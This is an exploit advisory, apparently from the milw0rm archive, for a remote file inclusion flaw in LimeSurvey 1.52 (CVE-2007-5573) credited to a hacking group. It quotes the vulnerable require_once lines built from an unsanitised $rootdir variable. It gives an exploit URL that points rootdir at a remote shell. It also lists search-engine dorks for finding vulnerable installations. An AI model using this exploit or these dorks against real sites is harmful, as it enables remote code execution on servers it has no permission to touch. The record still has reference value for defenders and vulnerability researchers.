LimeSurvey 1.52 - 'language.php' Remote File Inclusion

Author: S.W.A.T.
type: webapps
platform: php
port: 
date_added: 2007-10-16 
date_updated:  
verified: 1 
codes: OSVDB-37913;CVE-2007-5573 
tags: 
aliases:  
screenshot_url:  
application_url: 

                      \\\|///
                    \\  - -  //      Xmors Underground Group
                     (  @ @ )
              ----oOOo--(_)-oOOo--------------------------------------------------
              Portal   :  LimeSurvey (PHPSurveyor) 1.52 plus_build 2007.10.16
              Download :  http://garr.dl.sourceforge.net/sourceforge/limesurvey/limesurvey152plus_build3386_20071016.zip
	      Author   :  S.W.A.T.
	      HomePage :  wWw.XmorS.CoM
	      Type     :  Remote File Inclusion
              Y! ID    :  Svvateam
              E-Mail   :  Svvateam@yahoo.com / S.W.4.T@hackermail.com
              Dork     :  "You have not provided a survey identification number"
              Dork2    :  "LimeSurvey"
              ----ooooO-----Ooooo--------------------------------------------------
                  (   )     (   )
                   \ (       ) /
                    \_)     (_/

+---------------------------------------------------------------------------------------------+

Vuln Code :

require_once($rootdir.'/classes/php-gettext/gettext.php');

require_once($rootdir.'/classes/php-gettext/streams.php');

+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+

Exploit :

http://[TARGET]/[PATH]/classes/core/language.php?rootdir=[-Sh3ll-]


+---------------------------------------------------------------------------------------------+

# milw0rm.com [2007-10-17]